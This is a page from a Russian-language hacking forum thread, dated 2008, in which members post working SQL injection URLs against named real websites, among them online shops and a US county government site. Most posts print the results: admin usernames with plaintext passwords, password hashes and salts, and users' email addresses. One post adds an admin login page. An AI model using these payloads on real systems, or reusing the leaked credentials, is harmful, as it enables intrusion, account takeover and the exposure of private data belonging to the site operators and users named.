ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5281  
Старый 11.04.2008, 03:09
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://www.downtowncrossing.org/shop/shop.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usr,0x71) ,0x71),3,4+from+ssp_usrs+limit+1,1--


Table: ssp_usrs
Columns: pwd,id,email,usr

login: dca
password: brigley1969

login: kcrawford
email: downtowncrossing.org
password: 52fc3a


table: admin
column: user_id, username, password

login: dca2
password: kate

login: dca1
password: dertg1

ПИЗДЕЦ......нет слов. ни один пасс не подходит. Есть ещё таблица ssp_account с полем account_id, но мя канкретно зае это уже). Без энкрипта лучше не пробывать, выдаёт ашиппку,хоть и не везде =___= (реагирует на поля pwd и usr).

P.S. У кого дальше получится напишите в лс,или выложите тут. ОЧень интересно

Последний раз редактировалось Велемир; 11.04.2008 в 12:29..
 
Ответить с цитированием

  #5282  
Старый 11.04.2008, 07:14
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

http://www.tco.re/index.php?Page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x40,user(),database(),version()),14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41/*

user: tcoadmin@localhost
database: tco
version: 5.0.41-log


mysql.user: tcoadmin@*76692089A5E971F66C637F66F48EB82E39EE04B3
 
Ответить с цитированием

  #5283  
Старый 11.04.2008, 08:39
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5 ,6,unhex(hex(concat_ws(0x3,user(),database(),versi on()))),8/*

user: ODBC@localhost
database: stat
version: 4.1.12
 
Ответить с цитированием

  #5284  
Старый 11.04.2008, 11:43
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Цитата:
Сообщение от xcedz  

блин а если в курсе и можешь достать какого не делаешь? получается что сделал ты на половину ...
слухай а мож тебе еще базу их тут выложить или еще ченить дать?
делай сам...на этом получаешь опыт!
 
Ответить с цитированием

  #5285  
Старый 11.04.2008, 13:25
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Интернет магазин
http://www.greatmagazines.co.uk/store/displayitem.asp?sid=69&id=1+or+1=(SELECT+TOP+1+TAB LE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

version - Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

неполучилось получить таблицы...
 
Ответить с цитированием

  #5286  
Старый 11.04.2008, 13:31
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Интернет Магазин
http://www.myfavouritemagazines.co.uk/store/displayitem.asp?sid=416&id=1+or+1=@@version--
так же неполучилось...
 
Ответить с цитированием

  #5287  
Старый 11.04.2008, 13:33
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от .acme  
http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5 ,6,unhex(hex(concat_ws(0x3,user(),database(),versi on()))),8/*

user: ODBC@localhost
database: stat
version: 4.1.12
PHP код:
http://www.stat.uz/stat/index.php?lng=2&article=999+union+select+1,2,3,4,5,6,unhex(hex(concat(user,char(58),password))),8+from+mysql.user/* 
_________


PHP код:
http://www.pacedirect.co.uk/section.php?id=-2+union+select+1,2,3,4,5,concat(id,char(58),un,char(58),pw),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+pacedb.admins/* 
Цитата:
1:dwinsh1p:45YtuV
PHP код:
http://www.pacedirect.co.uk/section.php?id=-2+union+select+1,2,3,4,5,concat_ws(char(58),id,username,salt,password,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+pacedb.user/* 
Цитата:
1:super:c072d5eb784ea5b27e81ef26c7bd42fc:ad3579b46a059783c71603891c747efaf8d74c16:threethirdsfull@gmail.com
2:admin:1d25131da018647d045559f1bdfb19c1:8c5b6f5a685e0011be103b5d31a28b40a90c1e2d:ali@designdisclosure.com
 
Ответить с цитированием

  #5288  
Старый 11.04.2008, 15:11
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Офф сайт иллиноиса(Кажись )

.gov
http://starkco.illinois.gov/calendar.php?display=event&id=-177+union+select+1,concat(user(),char(58),version( ),char(58),database()),3,4,5,6,7,8,9,10,11,12/*&date=2007-Feb-01&returnto=month

gostark@localhost:4.1.22-standard:gostark_Community
 
Ответить с цитированием

  #5289  
Старый 11.04.2008, 22:54
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175

Репутация: 252
Отправить сообщение для BizzyD с помощью ICQ
По умолчанию

Код:
http://www.macspeech.com/pages.php?pID=99999+union+select+1/*
newsite_user@localhost:newsite:5.0.45-community-log

Админка:
Код:
https://secure.macspeech.com/storeadmin/login.php

Последний раз редактировалось BizzyD; 11.04.2008 в 23:40..
 
Ответить с цитированием

  #5290  
Старый 12.04.2008, 16:06
NilsonUA
Познающий
Регистрация: 25.11.2007
Сообщений: 55
Провел на форуме:
493288

Репутация: 58
Отправить сообщение для NilsonUA с помощью ICQ
По умолчанию

Код:
http://www.gamer.hr/tips/bg.php?id=-1+union+all+select+1,concat(email,char(58),password),3,4,5,6,7+from+user/*
radiax@net.hr:58ee6cec39128423
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ